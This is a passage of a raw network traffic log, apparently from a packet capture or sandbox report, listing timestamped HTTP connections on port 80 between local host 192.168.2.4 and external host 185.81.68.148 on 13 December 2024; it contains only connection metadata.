Dec 13, 2024 07:47:47.438797951 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.438826084 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.438826084 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.438851118 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.438874960 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.438898087 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.438927889 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.438927889 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.438952923 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.438982010 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.438982964 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.439007998 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.439049006 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.439049006 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.439074039 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.439097881 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.439126968 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.439126968 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.439208031 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.439229965 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.439260006 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.439302921 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.439344883 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.439346075 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.439383984 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.439383984 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.439435005 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.439476967 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.439502001 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.439531088 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.439531088 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.439557076 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.439580917 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.439610004 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.439610958 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.439635992 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.439665079 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.439665079 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.439690113 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.439713001 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.439750910 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.439752102 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.439776897 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.439799070 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.439820051 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.439850092 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.439850092 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.439876080 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.439898014 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.439920902 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.439944029 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.439965963 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.439990044 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.440018892 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.440018892 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.440043926 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.440064907 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.440084934 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.440109015 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.440131903 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.440161943 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.440161943 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.440186024 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.440210104 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.440237999 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.440237999 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.440263987 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.440287113 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.440315962 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.440315962 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.440340996 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.440363884 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.440385103 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.440406084 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.440429926 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.440459013 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.440459013 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.440484047 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.440512896 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.440514088 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.440538883 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.440561056 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.440589905 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.440589905 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.440666914 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.440691948 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.440721035 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.440721035 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.440746069 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.440768003 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.440792084 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.440829039 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.440829039 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.440855026 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.448028088 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.448050976 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.448076010 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.448103905 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.448132992 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.448153019 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.448179960 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.448201895 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.448225975 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.448249102 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.448271990 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.448286057 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.448312998 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.448340893 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.448362112 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.448385000 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.448405981 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.448431015 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.448456049 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.448481083 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.448501110 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.448520899 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.448544979 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.448561907 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.448585987 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.448606014 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.448626995 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.448649883 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.448672056 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.448693991 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.448715925 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.448736906 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.448760986 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.448786020 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.448812008 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.448832035 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.448853016 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.448874950 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.448895931 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.448918104 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.448937893 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.448961973 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.448982954 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.449002981 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.449024916 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.449047089 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.449069023 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.449093103 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.449117899 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.449140072 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.449166059 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.449186087 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.449208021 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.449232101 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.449249983 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.449275970 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.449290037 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.449311972 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.449336052 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.449357033 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.449378967 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.449403048 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.449424028 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.449446917 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.449470997 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.449491978 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.449512959 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.449537039 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.449557066 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.449584007 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.449608088 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.449624062 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.449650049 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.449671030 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.449693918 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.449713945 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.449738026 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.449760914 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.449784040 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.449804068 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.449824095 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.449848890 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.449868917 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.449889898 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.449909925 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.449932098 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.449956894 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.449978113 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.449999094 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.450021982 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.450045109 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.450058937 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.450084925 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.450110912 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.450133085 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.450158119 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.450177908 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.450198889 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.450223923 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.450244904 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.450263977 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.450285912 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.450314999 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.450342894 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.450362921 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.450386047 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.450409889 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.450432062 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.450459003 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.450480938 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.450503111 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.450525999 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.450550079 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.450572968 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.450591087 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.450614929 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.450638056 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.450663090 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.450684071 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.450706959 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.450726986 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.450747967 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.450769901 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.450798035 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.450818062 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.450844049 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.450870991 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.450880051 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.450910091 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.450930119 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.450954914 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.450977087 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.450998068 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.451020956 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.451040983 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.451059103 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.451083899 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.451103926 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.451128960 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.451150894 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.451170921 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.451191902 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.451212883 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.451236010 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.451257944 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.451282024 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.451302052 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.451323032 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.451345921 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.451365948 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.451387882 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.451416969 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.451440096 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.451467991 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.451488972 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.451512098 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.451533079 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.451555014 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.451580048 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.451600075 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.451622009 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.451642036 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.451668024 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.451689959 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.451709986 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.451730013 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.451752901 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.451781034 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.451803923 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.451824903 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.451845884 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.451872110 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.451893091 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.451914072 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.451935053 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.451958895 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.452003002 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.452003002 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.452025890 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.452052116 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.452080965 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.452105045 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.452130079 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.452153921 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.452174902 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.452194929 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.452218056 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.452239037 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.452265024 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.452282906 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.452307940 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.452327967 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.452349901 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.452372074 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.452393055 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.452414989 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.452438116 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.452462912 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.452487946 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.452507973 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.452528954 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.452550888 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.452572107 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.452596903 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.452617884 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.452641010 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.452662945 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.452680111 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.452708960 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.452734947 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.452758074 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.452778101 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.452805996 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.452827930 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.452842951 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.452867031 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.452888012 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.452909946 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.452935934 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.452955961 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.452976942 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.452997923 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.453032017 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.453046083 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.453068018 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.453093052 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.453111887 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.453136921 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.453161001 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.453183889 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.453201056 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.453219891 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.453246117 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.453265905 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.473767042 CET	49774	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.474019051 CET	49780	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.487548113 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.487782955 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.487864017 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.487905979 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.487916946 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.488260031 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.488305092 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.488313913 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.488375902 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.488385916 CET	80	49777	185.81.68.148	192.168.2.4
